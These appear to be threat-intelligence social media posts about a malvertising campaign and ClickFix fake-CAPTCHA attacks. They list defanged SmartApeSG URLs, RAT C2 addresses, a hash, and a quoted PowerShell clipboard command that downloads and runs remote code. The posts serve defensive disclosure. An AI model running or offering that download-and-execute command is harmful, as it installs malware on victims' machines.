2026-04-22: Malicious ad (#Malvertizing) for Claude leads to #ClickFix style page for #macOS #malware
Details at https://www.malware-traffic-analysis.net/2026/04/22/index.html
I've seen a bit about this activity from other sources, but this is the infection I generated in my lab and finally got around to posting.
2026-04-27 (Monday): Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:
- hxxps[:]//datanexlab[.]top/trace/audit-module.js
- hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
- hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45

#ClickFix script injected into clipboard:
powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)

Traffic leading to #RAT payload:
- hxxp[:]//216.120.201[.]116/
- hxxp[:]//104.225.129[.]105/
- hxxps[:]//truebasecore[.]com/io

Zip archive with package for RAT payload:
- SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365

#RAT payload C2 traffic:
- tcp[:]//89.110.110[.]119:443/
After working on it a bit, we have a fix for a recent #ClickFix attack against #macOS that leverages AppleScript. Here's the writeup, and a link to the forum thread!
https://ifin-intel.org/blog/applescript/
#ThreatIntel #ThreatIntelligence #IFIN
@BrandonD I don't really know what their criteria are for the gateway URL with the /g path. They do seem to toggle it off for periods of time. I speculate they only have it enabled during victim business hours and when they're on the clock, so to speak.